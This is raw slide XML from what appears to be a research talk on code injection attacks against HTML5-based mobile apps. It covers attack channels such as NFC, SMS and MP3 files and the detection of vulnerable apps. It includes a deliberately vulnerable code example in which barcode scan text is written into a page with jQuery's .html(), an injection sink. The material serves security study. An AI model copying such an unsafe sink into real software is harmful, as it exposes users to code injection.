          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="307" name="export-path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2926" y="1211212"/>
            <a:ext cx="3543301" cy="2298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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="528637"/>
            <a:ext cx="8229601" cy="8572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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Other Static Analysis in Android</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="310" name="Table 310"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="99836" y="1855828"/>
          <a:ext cx="5374800" cy="2999996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791600"/>
                <a:gridCol w="1791600"/>
                <a:gridCol w="1791600"/>
              </a:tblGrid>
              <a:tr h="1270972">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0"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sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Privilege escalation</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:sym typeface="Helvetica Neue"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0"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sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>(Permission)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="34300" marR="34300" marT="34300" marB="343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sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Component Hijacking (Intent)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="34300" marR="34300" marT="34300" marB="343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sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>SSL/TLS</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="34300" marR="34300" marT="34300" marB="343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0F6FC6"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="515432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400" b="1" i="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Stowaway</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="34300" marR="34300" marT="34300" marB="343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400" b="1" i="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Chex</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="34300" marR="34300" marT="34300" marB="343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400" b="1" i="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>SMV-HUNTER</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="34300" marR="34300" marT="34300" marB="343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</a:tr>
              <a:tr h="698160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400">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Pscout</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="34300" marR="34300" marT="34300" marB="343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400">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Woodpecker</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:defRPr sz="1800" b="0" i="0"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1400">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>ContentScope</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="34300" marR="34300" marT="34300" marB="343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400">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>MalloDroid</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="34300" marR="34300" marT="34300" marB="343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515432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400" b="1" i="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>ComDroid</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="34300" marR="34300" marT="34300" marB="343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400" b="1" i="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>AppSealer</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="34300" marR="34300" marT="34300" marB="343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400" b="1" i="1">
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>CryptoLint</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="34300" marR="34300" marT="34300" marB="343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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Shape 313"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="983298"/>
            <a:ext cx="8229600" cy="372570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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Background and motivation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Overall problem definition and challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Related work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" b="1"/>
              <a:t>Solutions for paper 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Solutions for paper 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Comparison between the two papers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Conclusions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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="528637"/>
            <a:ext cx="8229601" cy="8572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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Shape 316"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1451371"/>
            <a:ext cx="8229601" cy="3292082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="34275" tIns="34275" rIns="34275" bIns="34275">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pP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49914" lvl="0" indent="-456264">
              <a:buSzPct val="95000"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Code Injection Attacks on HTML5-based mobile apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pP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49914" lvl="0" indent="-456264">
              <a:buSzPct val="95000"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Detection of Code Injection Attacks on HTML5-based mobile apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="114300">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pP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49914" lvl="0" indent="-456264">
              <a:buSzPct val="95000"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Mitigation of Code Injection Attacks on HTML5-based mobile apps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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405423" y="2143124"/>
            <a:ext cx="8616462" cy="8572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2" defTabSz="704087">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="29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rPr>
              <a:t>Code Injection Attacks on HTML5-based Mobile App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age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733" y="321195"/>
            <a:ext cx="3932400" cy="2126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2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03733" y="321195"/>
            <a:ext cx="4149903" cy="20565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3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03733" y="2639888"/>
            <a:ext cx="4149903" cy="2146504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 flipH="1">
            <a:off x="4588673" y="321197"/>
            <a:ext cx="6" cy="1979400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050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4588674" y="2725834"/>
            <a:ext cx="19506" cy="2028903"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050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152" name="image4.jpe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3163" y="2639888"/>
            <a:ext cx="3999301" cy="2114705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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250687" y="2432137"/>
            <a:ext cx="494705" cy="284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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400"/>
              <a:t>(a)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Shape 154"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5461182" y="2424251"/>
            <a:ext cx="494705" cy="284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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400"/>
              <a:t>(c)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Shape 155"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3310359" y="2432137"/>
            <a:ext cx="494705" cy="284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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400"/>
              <a:t>(b)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="Shape 156"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7520854" y="2432137"/>
            <a:ext cx="494705" cy="284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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400"/>
              <a:t>(d)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Shape 157"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5461182" y="4668746"/>
            <a:ext cx="494705" cy="284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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400"/>
              <a:t>(g)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Shape 158"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3310359" y="4668746"/>
            <a:ext cx="494705" cy="284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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400"/>
              <a:t>(f)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Shape 159"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1159535" y="4668746"/>
            <a:ext cx="494704" cy="284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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400"/>
              <a:t>(e)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Shape 160"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7520854" y="4668746"/>
            <a:ext cx="494705" cy="284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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400"/>
              <a:t>(h)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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="528637"/>
            <a:ext cx="8229601" cy="8572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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Scripting Attack (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="323" name="image2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2757" y="1385887"/>
            <a:ext cx="4229106" cy="36436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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="528637"/>
            <a:ext cx="8229601" cy="8572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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Overview of our Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="326" name="image2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3675" y="1385887"/>
            <a:ext cx="5802923" cy="3619971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Shape 327"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6919544" y="2433784"/>
            <a:ext cx="1987066" cy="703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 anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="210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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Much broader attack surface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Shape 328"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810817" y="1897427"/>
            <a:ext cx="903967" cy="21819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FF0000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pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Shape 329"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2256478" y="2775015"/>
            <a:ext cx="903967" cy="4207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FF0000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" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="329" grpId="2" animBg="1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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="528637"/>
            <a:ext cx="8229601" cy="8572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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Condition1: Attack Channels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="332" name="image2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502" y="1585014"/>
            <a:ext cx="2876896" cy="30285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image3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59588" y="1585016"/>
            <a:ext cx="2750108" cy="3028547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image6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64582" y="1585014"/>
            <a:ext cx="2803924" cy="3059785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="Shape 335"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000121" y="4628381"/>
            <a:ext cx="1175662" cy="386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 algn="ctr">
              <a:defRPr sz="2100" b="1"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pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" b="1"/>
              <a:t>NFC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Shape 336"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3984171" y="4643199"/>
            <a:ext cx="1175662" cy="386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 algn="ctr">
              <a:defRPr sz="2100" b="1"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pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" b="1"/>
              <a:t>SMS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Shape 337"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046813" y="4612794"/>
            <a:ext cx="1175662" cy="386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 algn="ctr">
              <a:defRPr sz="2100" b="1"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pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" b="1"/>
              <a:t>MP3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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="528637"/>
            <a:ext cx="8229601" cy="8572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841247">
              <a:defRPr sz="34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04617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Condition2: Display APIs(Triggering Code)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="340" name="image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5752" y="1363678"/>
            <a:ext cx="4139806" cy="37798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3" name="Group 343"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5477601" y="1891139"/>
            <a:ext cx="3209204" cy="1956899"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3209202" cy="1956897"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="341" name="Shape 341"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="3209203" cy="1956899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just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-1" y="338931"/>
              <a:ext cx="3209203" cy="12790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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="just">
                <a:defRPr sz="21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100">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>In our sample set (15,510 apps), 93% of apps use at least one unsafe APIs/attributes at least one time</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="Shape 344"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1386981" y="2104145"/>
            <a:ext cx="3948378" cy="1634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FF0000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pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="Shape 345"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1386981" y="3171875"/>
            <a:ext cx="3948378" cy="1634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FF0000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pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Shape 346"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1386981" y="3335280"/>
            <a:ext cx="3948378" cy="1633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FF0000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"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="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"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13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" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="345" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="346" grpId="3" animBg="1" advAuto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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="528637"/>
            <a:ext cx="8229601" cy="8572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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerable Code Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="351" name="Group 351"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1059864" y="1530480"/>
            <a:ext cx="5121819" cy="3119345"/>
            <a:chOff x="-1" y="-1"/>
            <a:chExt cx="5121817" cy="3119344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="349" name="Shape 349"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2" y="-2"/>
              <a:ext cx="5121819" cy="3119345"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat">
              <a:solidFill>
                <a:srgbClr val="125092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-2" y="14092"/>
              <a:ext cx="5121819" cy="30911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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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document.addEventListener("deviceready", onDeviceReady, false);</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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function onDeviceReady() {</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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 window.plugins.barcodeScanner.scan(0, onSuccess, onError);</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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}</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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function onSuccess(result) {</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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 $("#display").html(result.text);</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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}</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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function onError(contactError) {</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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 alert('onError!');</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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}</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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function unrealted() {</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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  alert(‘Unrelated functio’);</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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} </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Shape 352"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182251" y="2291364"/>
            <a:ext cx="4436922" cy="218209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000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pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Shape 353"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194953" y="2901270"/>
            <a:ext cx="2473041" cy="197431"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000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pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="Shape 354"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5631870" y="2276849"/>
            <a:ext cx="1007923" cy="232554"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000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3667990" y="2882332"/>
            <a:ext cx="561113" cy="234067"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000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56" name="Shape 356"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276109" y="2297901"/>
            <a:ext cx="2744803" cy="703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 anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="210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Condition 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="210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(channel: barcode)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Shape 357"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3531308" y="3045648"/>
            <a:ext cx="2744802" cy="703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 anchor="ctr">
            <a:spAutoFit/>
